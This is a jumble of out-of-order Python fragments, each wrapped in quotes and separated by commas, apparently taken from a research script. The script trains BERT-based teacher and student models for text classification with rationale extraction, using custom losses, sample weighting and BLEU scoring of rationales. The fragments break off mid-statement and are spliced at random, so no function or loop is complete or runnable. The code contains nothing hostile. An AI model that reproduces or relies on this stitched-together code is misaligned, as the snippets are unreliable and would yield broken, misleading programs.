pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_teacher_'+type_+'.json'), 'w')", "(task) {}\".format(test_task_acc)) if test_task_acc >= max_best_acc: max_best_acc = test_task_acc model_file = os.path.join(model_dir, \"model_token_{}_{}.h5\".format(epoch,", "test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1] == 1: temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+=", "= np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) #y_rat", "axis=-1) #y_rat = y_rat[:, 1:] #y_pred = y_pred[:,1:] # sample from unlabeled set", "with open(os.path.join(model_dir, 'rationale_output_test_teacher_'+type_+'.json'), 'w') as f: json.dump(data, f) model_student = None # model_task", "np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) elif", "type_: if 'pruthi_' in type_: out = y_train acc, y_pred, r_acc = y_train[:,0],", "0, 1)) logger.info(\"BLEU-1 score of rationales on test set (student model): {} \".format(score1/len(pred)))", "of rationales selected: {}\".format(np.mean(np.sum(attention_mask_r, axis=-1)))) attention_mask_r[:,0] = 1 negation_mask = np.where(attention_mask_r==0, 1, 0)", "{}\".format(y_batch.shape)) #X_batch, y_batch, X_conf = f_(tokenizer, X_unlabeled_sample, y_mean, y_var, acc, unsup_size, len(labels), y_T=y_T,", "' '.join(text) temp['truth'] = truth[i] temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with", "in type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} elif 'joint' in", "len(labels)), 1/len(labels)) temp = 
model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0) elif 'joint' in", "best base model based on validation loss best_base_model = None best_validation_loss = np.inf", "score2 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 1, 0, 0)) score3 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 1,", "temp = dict() temp['text'] = ' '.join(text) temp['truth'] = truth[i] temp['pred'] = pred[i]", "in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1] == 1: #to skip", "indx = np.where(y_batch[:,0]==i)[0] GLOBAL_SEED = int(os.getenv(\"PYTHONHASHSEED\")) random.Random(GLOBAL_SEED).shuffle(indx) if len(indx) > unsup_size: indx =", "val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]) logger.info (\"Validation loss for run {}", "X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch, y_batch[:, 0], np.ones(len(y_batch))],", "nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(1, 0, 0, 0)) score2 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 1, 0, 0)) score3", "from teacher model as input for task: {}\".format(X_sample[\"input_ids\"][:5])) logger.info(\"Extracted rationale from teacher model", "X_batch, y_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_batch[indices] if 'joint' in", "(task) {}\".format(task_acc)) logger.info (\"Test acc (task) {}\".format(test_task_acc)) if test_task_acc >= max_best_acc: max_best_acc =", "def custom_loss(y_true, y_pred): cce = 
tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) tf.print(tf.size(y_true), tf.size(y_pred)) cce_loss = ((cce(y_true, y_pred))*", "test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[-2] elif 'joint_neg' in type_: y_neg_dev = np.full((len(y_dev),", "rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_joint(TFModel, Config, pt_teacher_checkpoint, max_seq_length,", "model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc))", "tf.distribute.MirroredStrategy() gpus = strategy.num_replicas_in_sync logger.info('Number of devices: {}'.format(gpus)) #run the base model n", "elif 'joint_neg' in type_: rat_loss = None if 'focal' in type_: rat_loss =", "(X_unlabeled_sample[\"input_ids\"][:5]) if 'joint' in type_: ids = [] attention_mask_r = np.ones((len(y_pred), max_seq_length)) attention_mask_r[:,1:]", "in type_: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size],", "= tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) model = models.construct_teacher_joint_neg(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels),", "#labels = [0, 1] #fix hardcoding labels = set(y[:,0]) logger.info (\"Class labels {}\".format(labels))", "val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc", "1/len(labels)) temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], 
y_neg_test], verbose=0) elif 'joint' in type_:", "'l2_distance': custom_loss}, metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.Mean(name='mean')]) #X_batch.update(X_rationale_batch) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'],", "np.ones(len(y_test))], verbose=0)[-3] if '_neg' in type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test =", "y_rat = np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc,", "'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices], 'input_ids_neg':X_unlabeled['input_ids_neg'][indices], 'token_type_ids_neg':X_unlabeled['token_type_ids_neg'][indices], 'attention_mask_neg':X_unlabeled['attention_mask_neg'][indices]}, y_pred[indices] elif 'joint' in type_:", "logger.info(\"Best task acc score: {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) logger.info(\"Best token acc score: {}\".format(precision_recall_fscore_support(y_pred, y_test[:,1:],", "= y_rat[:,1:] #y_pred = y_pred[:,1:] else: out = model.predict(X_unlabeled_sample, batch_size=64) acc, y_pred, r_acc", "{\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:]}, y[train_size:] else: X_train, y_train", "\"model_best.h5\") if os.path.exists(model_file): 
model.load_weights(model_file) #model_task.load_weights(model_file_task) best_base_model = model logger.info (\"Model file loaded from", "for i in labels: indx = np.where(y_batch[:,0]==i)[0] GLOBAL_SEED = int(os.getenv(\"PYTHONHASHSEED\")) random.Random(GLOBAL_SEED).shuffle(indx) if len(indx)", "np.full((len(y_batch),len(labels)), 1/len(labels))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss',", "epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance': None})", "= np.ones((len(X_batch['input_ids']), max_seq_length)) for i in range(len(cls)): X_conf[i,0] = class_weight[cls[i][0]]*X_conf[i,0] #logger.info (\"Weights {}\".format(X_conf[:10]))", "logger.info (\"X Unlabeled Shape: {}\".format(X_unlabeled[\"input_ids\"].shape)) strategy = tf.distribute.MirroredStrategy() gpus = strategy.num_replicas_in_sync logger.info('Number of", "axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) #compute confidence on", "logger.info(\"Extracted rationale from teacher model as input for task: {}\".format(X_sample[\"input_ids\"][:5])) logger.info(\"Extracted rationale from", "of rationales on test set (teacher model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales", "in type_: X_negation_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), 
\"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": negation_mask} for i in", "= int((1. - valid_split)*len(X[\"input_ids\"])) if '_neg' in type_: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size],", "y_neg_dev], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-3] out1 = model.predict(X_test)", "= deepcopy(model) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] ''' if val_loss", "max_test_acc: max_test_acc = test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0)[-3] elif", "(\"Validation loss for run {} : {}\".format(counter, val_loss)) if val_loss[0] < best_validation_loss: best_base_model", "logger.info (\"Evaluating confidence on {} number of instances\".format(len(X_unlabeled[\"input_ids\"]))) X_unlabeled_sample = X_unlabeled #X_unlabeled_sample =", "= [] for i in range(len(X_test[\"input_ids\"])): text = tokenizer.decode(X_test[\"input_ids\"][i]) temp = dict() temp['text']", "epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") elif type_ == 'joint': rat_loss =", "y_dev[:,0], np.ones(len(y_dev))]) logger.info (\"Validation loss for run {} : {}\".format(counter, val_loss)) if val_loss[0]", "for epoch in range(unsup_epochs): logger.info (\"Starting loop {}\".format(epoch)) if type_ == 'mtl': test_acc", "in range(len(cls)): X_conf[i,0] = class_weight[cls[i][0]]*X_conf[i,0] #logger.info (\"Weights {}\".format(X_conf[:10])) logger.info(\"X_connf shape: {}\".format(X_conf.shape)) if 'mtl'", "elif 'joint' in type_: if 'pruthi_' in type_: out = y_train acc, y_pred,", "y_train[:,0], y_train[:,1:], y_train[:,0] y_val 
= acc y_rat = np.array(y_pred).astype('float') #y_rat = y_rat[:,1:] #y_pred", "coverage (recall): {}\".format(r)) logger.info(\"Token Precision: {}\".format(p)) logger.info(\"Token overlap: {}\".format(tp/(tp+fp+fn))) score1, score2, score3, score4", "i in range(len(X_test[\"input_ids\"])): text = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i]) temp = dict() temp['text'] = ' '.join(text)", "y_dev = X_dev, y_dev logger.info(\"X Train Shape: {} {}\".format(X_train[\"input_ids\"].shape, y_train.shape)) logger.info(\"X Dev Shape:", "np.ones(len(y_dev))]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0],", "= np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) #y_rat = y_rat[:, 1:] #y_pred =", "r = tp/(tp+fn+0.0000001) logger.info(\"Token-level: {}\".format((tp)/(tp+(0.5*(fp+fn))))) logger.info(\"Rationale coverage (recall): {}\".format(r)) logger.info(\"Token Precision: {}\".format(p)) logger.info(\"Token", "sample_size=16384, TFModel=TFBertModel, Config=BertConfig, pt_teacher_checkpoint='bert-base-uncased', sample_scheme='easy_bald_class_conf', T=30, alpha=0.1, valid_split=0.5, sup_epochs=70, unsup_epochs=25, N_base=10, dense_dropout=0.5, attention_probs_dropout_prob=0.3,", "best_val_acc = task_acc model.save_weights(model_file_best) #_student = deepcopy(model) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0],", "= np.ones((len(y_batch), max_seq_length)) log_probs = (probs+1e-10) #+(1-y_batch[:,0])*np.log(1-probs+1e-10)) log_rationale = (probs_rat+1e-10) if 'rwt' in", "loss_weights = [1.0, 1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': custom_loss,", "y_T=y_T, type_=type_) probs = y_val[indices] 
probs_rat = y_rat[indices] cls = list(acc[indices]) logger.info(cls) X_conf", "restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:]]) if 'fine_tune_teacher' in type_: rat_loss = None if 'focal' in", "0, 0] model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':rat_loss, 'rationale_task_classifier': None, 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "- valid_split)*len(X[\"input_ids\"])) if '_neg' in type_: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size],", "''' #acc = acc[:,None] #y_batch = np.concatenate((acc[indices], y_pred), axis=1) acc = acc[:,None] y_batch", "[] #sys.exit(1) test_pred = y_pred #np.argmax(y_pred, axis=-1) logger.info(\"Printing prediction data on student model", "out[2] logger.info(\"Raw logits: {}\".format(acc)) y_pred = np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1) r_acc", "best_loss: best_loss = val_loss model.save_weights(model_file_best) #_student = deepcopy(model) ''' if test_acc > max_test_acc:", "axis=-1) r_acc1 = np.argmax(r_acc1, axis=-1) logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='micro')))", "acc (task) for joint {}\".format(temp)) logger.info (\"Val acc (token) {}\".format(test_acc)) logger.info (\"Val acc", "{}\".format(acc)) y_pred = np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1)", "axis=1) X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]} if 
'joint' in type_:", "y_test[:,0], average='micro'))) elif 'joint' in type_: out = model_student.predict(X_test) acc, y_pred, r_acc =", "teacher model as input for task: {}\".format(X_sample[\"input_ids\"][:5])) logger.info(\"Extracted rationale from teacher model as", "out[0], out[1], out[2] y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat = np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1)", "model_student = None # model_task for epoch in range(unsup_epochs): logger.info (\"Starting loop {}\".format(epoch))", "{}\".format(X_train[\"input_ids\"].shape, y_train.shape)) logger.info(\"X Dev Shape: {} {}\".format(X_dev[\"input_ids\"].shape, y_dev.shape)) logger.info(\"X Test Shape: {} {}\".format(X_test[\"input_ids\"].shape,", "for i in range(len(X_test[\"input_ids\"])): text = tokenizer.decode(X_test[\"input_ids\"][i]) temp = dict() temp['text'] = text", "X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size], \"input_ids_neg\":X[\"input_ids_neg\"][:train_size], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][:train_size], \"attention_mask_neg\":X[\"attention_mask_neg\"][:train_size]}, y[:train_size] X_dev,", "os.path.join(model_dir, \"model_label.h5\") model_file_task = os.path.join(model_dir, \"model_task.h5\") model_file_best = os.path.join(model_dir, \"model_best.h5\") if os.path.exists(model_file): model.load_weights(model_file)", "X_sample[\"input_ids\"][i, 1:]) if '_neg' in type_: X_negation_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, X_negation_sample[\"input_ids\"][i, 1:], 103)", "'rwt' in type_: #re-weight labels X_conf[:,0] = np.where(log_probs>0, log_probs, 0.00000001) if 'norm' in", "# class_weight=class_weight) elif 'joint_neg' in type_: logger.info(\"Training for 
without rationales\") with strategy.scope(): def", "y_train[:,0], y_neg], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=sup_batch_size*1, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss',", "type_: loss_weights = [1.0, 1.0, 0, 0] model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':rat_loss, 'rationale_task_classifier':", "sample_scheme)) if os.path.exists(model_file): model.load_weights(model_file) logger.info (\"Model file loaded from {}\".format(model_file)) continue if 'mtl'", "code base is adapted from UST (https://github.com/microsoft/UST) \"\"\" from collections import defaultdict from", "are not rationales u-r if '_neg' in type_: X_negation_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\":", "'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': custom_loss}, metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.Mean(name='mean')]) #X_batch.update(X_rationale_batch) X_batch['input_ids_r'], X_batch['token_type_ids_r'],", "out[5] elif 'joint' in type_: out = model.evaluate(X_test, [y_test[:,0], y_test, y_test[:,0], np.ones(len(y_test))]) task_acc,", "out = model.predict(X_test) class_acc, test_pred, r_acc = out[0], out[1], out[2] class_acc = np.argmax(class_acc,", "if 'joint' in type_: X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\": X_sample['token_type_ids'][indices], \"attention_mask_r\": X_sample['attention_mask'][indices]} if", "\".format(score3/len(pred))) logger.info(\"BLEU-4 
score of rationales on test set (teacher model): {} \".format(score4/len(pred))) best_loss", "val_loss = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[0] elif '_neg' in type_: out = model.evaluate(X_test,", "rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = None if '_noexp' in", "out[1], out[2] class_acc = np.argmax(class_acc, axis=-1) logger.info(\"Class predictions shape {}\".format(class_acc.shape)) logger.info(\"Teacher model best", "y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc))", "\"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": negation_mask} for i in range(len(y_pred)): X_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, 103,", "range(len(pred)): score1 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(1, 0, 0, 0)) score2 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 1,", "type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0) elif 'mtl' in type_:", "[y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]) elif 'joint' in type_: _placeholder_labels = np.empty((y_train.shape[0],", "val_loss < best_loss: best_loss = val_loss model.save_weights(model_file_best) #_student = deepcopy(model) ''' if test_acc", "np.ones(len(y_train))], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) #", "logger.info(y_train.shape) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), 
batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)])", "= X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch, y_batch[:, 0], np.ones(len(y_batch))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev,", "model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) #", "acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices]), axis=1) X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\":", "= [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] for j in range(0,len(test_pred[0])-1): if test_pred[i][j] ==", "len(labels)), 1/len(labels))]), batch_size=sup_batch_size*1, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)]) #, class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:],", "X_sample['input_ids'][indices], \"token_type_ids\": X_sample['token_type_ids'][indices], \"attention_mask\": X_sample['attention_mask'][indices]} ''' #acc = acc[:,None] #y_batch = np.concatenate((acc[indices], y_pred),", "rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = [1.0, 1.0, 1.0, 1.0] ''' if '_noexp' in", "1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:], X_conf[:,0], np.ones((len(y_batch)))]) # class_weight=class_weight) if 'fine_tune_teacher'", 
"reduction=tf.keras.losses.Reduction.NONE) if 'focal' in type_: cce = SparseCategoricalFocalLoss(gamma=2, reduction=tf.keras.losses.Reduction.NONE) cce_loss = ((cce(y_true, y_pred))*", "= np.argmax(r_acc, axis=-1) #compute confidence on the unlabeled set if sample_size < len(X_unlabeled[\"input_ids\"]):", "= tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) if 'focal' in type_:", "np.ones((len(y_pred), max_seq_length)) attention_mask_r[:,1:] = np.array(y_pred) #logger.info(y_pred.shape) #logger.info(\"Percentage of rationales selected: {}\".format(np.mean(np.sum(attention_mask_r, axis=-1)))) attention_mask_r[:,0]", "= {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_batch[indices] if 'joint' in type_: X_rationale_batch", "\"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_batch[indices] if 'joint' in type_: X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices],", "\"input_ids_neg\":X[\"input_ids_neg\"][:train_size], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][:train_size], \"attention_mask_neg\":X[\"attention_mask_neg\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:],", "1.0, 1.0, 1.0] if '_noexp' in type_: loss_weights = [1.0, 0.0, 0.0, 0.0]", "= np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat = np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1) y_pred = np.argmax(y_pred, axis=-1)", "loss for run {} : {}\".format(counter, val_loss)) if val_loss[0] < best_validation_loss: best_base_model 
=", "= {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:]}, y[train_size:] else: X_train,", "y_pred1, r_acc1 = out1[0], out1[1], out1[2] y_pred1 = np.argmax(y_pred1, axis=-1) acc1 = np.argmax(acc1,", "class_weight=class_weight) if 'fine_tune_teacher' in type_: rat_loss = None if 'focal' in type_: rat_loss", "{} unlabeled instances\".format(sample_size, len(X_unlabeled[\"input_ids\"]))) indices = np.random.choice(len(X_unlabeled[\"input_ids\"]), sample_size, replace=False) if '_neg' in type_:", "acc1 = np.argmax(acc1, axis=-1) r_acc1 = np.argmax(r_acc1, axis=-1) logger.info(\"Model performance for token (macro/task):", "y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) rat_loss = None if 'focal'", "patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:], X_conf[:,0], np.ones((len(y_batch)))]) # class_weight=class_weight) if 'fine_tune_teacher' in type_: rat_loss", "replace=False) if '_neg' in type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask':", "indices = np.asarray(indices) #indices = np.random.choice(len(X_unlabeled_sample['input_ids']), unsup_size, replace=False) X_batch, y_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices],", "for base model {}: {}\".format(best_validation_loss, model.evaluate(X_dev, [y_dev[:,0],y_dev[:,1:]]))) ''' if not os.path.exists(model_file): model.save_weights(model_file) logger.info", "def custom_loss_neg(y_true, y_pred): cce = 
tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) model = models.construct_teacher_joint_neg(TFModel,", "range(len(X_test[\"input_ids\"])): text = tokenizer.decode(X_test[\"input_ids\"][i]) temp = dict() temp['text'] = text temp['truth'] = truth[i]", "on test set (student model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on test", "'l2_distance': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance': None}) elif 'joint_neg' in type_: rat_loss =", "[y_test[:,0], y_test[:,1:]], verbose=0)[-2] elif 'joint_neg' in type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test", "Shape: {} {}\".format(X_test[\"input_ids\"].shape, y_test.shape)) logger.info (\"X Unlabeled Shape: {}\".format(X_unlabeled[\"input_ids\"].shape)) strategy = tf.distribute.MirroredStrategy() gpus", "= np.ones((len(y_pred), max_seq_length)) attention_mask_r[:,1:] = np.array(y_pred) #logger.info(y_pred.shape) #logger.info(\"Percentage of rationales selected: {}\".format(np.mean(np.sum(attention_mask_r, 